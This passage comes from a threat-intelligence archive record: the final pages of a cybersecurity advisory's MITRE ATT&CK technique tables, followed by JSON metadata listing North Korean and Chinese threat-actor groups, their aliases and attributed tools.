a hash or a clear text\r\npassword, from the operating system and software.\r\nExfiltration Over\r\nAlternative\r\nProtocol\r\nT1048\r\nThe actors steal data by exfiltrating it over a different protocol than that\r\nof the existing command and control channel.\r\nProxy T1090\r\nThe actors use a connection proxy to direct network traffic between\r\nsystems or act as intermediary for network communications to a\r\ncommand and control server to avoid direct connections to their\r\ninfrastructure.\r\nArchive Collected\r\nData\r\nT1560\r\nThe actors compress and/or encrypt data that is collected prior to\r\nexfiltration.\r\nProtocol Tunneling T1572\r\nThe actors tunnel network communications to and from a victim system\r\nwithin a separate protocol to avoid detection/network filtering and/or\r\nenable access to otherwise unreachable systems.\r\nDevelop\r\nCapabilities:\r\nMalware\r\nT1587.001 The actors develop malware and malware components that can be used\r\nduring targeting.\r\nDevelop\r\nCapabilities:\r\nExploits\r\nT1587.004\r\nThe actors develop exploits that can be used during targeting.\r\nTable 5. Software used for Resource Development, Tooling, and RATs\r\nSoftware\r\nTitle\r\nID Use\r\nMimikatz\r\nS0002\r\nThe actors use a credential dumper capable of obtaining plaintext Windows account\r\nlogins and passwords, along with many other features that make it useful for testing\r\nthe security of networks.\r\nAdFind\r\nS0552 The actors use a free command-line query tool that can be used for gathering\r\ninformation from the Active Directory.\r\nTable 6. Initial Access\r\nTechnique Title ID Use\r\nExploit Public-Facing\r\nApplication\r\nT1190 The actors attempt to exploit a weakness in an Internet-facing host or\r\nsystem to initially access a network.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 29 of 31\n\nTable 7. Execution\r\nTechnique Title ID Use\r\nCommand and Scripting\r\nInterpreter\r\nT1059 The actors abuse command and script interpreters to execute\r\ncommands, scripts, or binaries.\r\nTable 8. Defense Evasion\r\nTechnique Title ID Use\r\nObfuscated Files or\r\nInformation\r\nT1027\r\nThe actors attempt to make an executable or file difficult to discover or\r\nanalyze by encrypting, encoding, or otherwise obfuscating its content on\r\nthe system or in transit.\r\nTable 9. Credential Access\r\nTechnique\r\nTitle\r\nID Use\r\nOS Credential\r\nDumping\r\nT1003\r\nThe actors attempt to dump credentials to obtain account login and credential\r\nmaterial, normally in the form of a hash or a clear text password, from the\r\noperating system and software.\r\nTable 10. Discovery and Lateral Movement\r\nTechnique Title ID Use\r\nRemote Services T1021\r\nThe actors use valid accounts to log into a service that accepts\r\nremote connections, such as telnet, SSH, and VNC.\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nT1021.002 The actors use valid accounts to interact with a remote network\r\nshare using Server Message Block (SMB).\r\nFile and Directory\r\nDiscovery\r\nT1083\r\nThe actors enumerate files and directories or may search in\r\nspecific locations of a host or network share for certain\r\ninformation within a file system.\r\nAccount Discovery T1087\r\nThe actors attempt to get a listing of valid accounts, usernames,\r\nor email addresses on a system or within a compromised\r\nenvironment.\r\nTable 11. Command and Control\r\nTechnique Title ID Use\r\nApplication Layer\r\nProtocol\r\nT1071\r\nThe actors establish command and control capabilities over commonly used\r\napplication layer protocols such as HTTP(S), OPC, telnet, DNP3, and\r\nModbus.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 30 of 31\n\nTechnique Title ID Use\r\nProxy\r\nT1090 The actors use a connection proxy to direct network traffic between systems\r\nor act as an intermediary for network communications.\r\nTable 12. Collection and Exfiltration\r\nTechnique Title ID Use\r\nData from Network\r\nShared Drive\r\nT1039 The actors search network shares on computers they have\r\ncompromised to find files of interest.\r\nExfiltration Over\r\nAlternative Protocol\r\nT1048 The actors steal data by exfiltrating it over a different protocol than\r\nthat of the existing command and control server.\r\nArchive Collected Data\r\nT1560 The actors compress and/or encrypt data that is collected prior to\r\nexfiltration.\r\nExfiltration Over Web\r\nService\r\nT1567 The actors use an existing, legitimate external Web service to exfiltrate\r\ndata rather than their primary command and control channel.\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a" ], "report_names": [ "aa24-207a" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "40ec2da8-7156-4bff-b878-41984eb70df4", "created_at": "2024-02-02T02:00:04.080917Z", "updated_at": "2026-04-10T02:00:03.555365Z", "deleted_at": null, "main_name": "Storm-0530", "aliases": [ "DEV-0530", "H0lyGh0st" ], "source_name": "MISPGALAXY:Storm-0530", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d", "created_at": "2024-05-01T02:03:07.943593Z", "updated_at": "2026-04-10T02:00:03.795229Z", "deleted_at": null, "main_name": "BRONZE EDISON", "aliases": [ "APT4 ", "DarkSeoul", "Maverick Panda ", "Salmon Typhoon ", "Sodium ", "Sykipot ", "TG-0623 ", "getkys" ], "source_name": "Secureworks:BRONZE EDISON", "tools": [ "Gh0st RAT", "Wkysol", "ZxPortMap" ], "source_id": "Secureworks", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434889, "ts_updated_at": 1775826694, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.pdf", "text": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.txt", "img": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.jpg" } }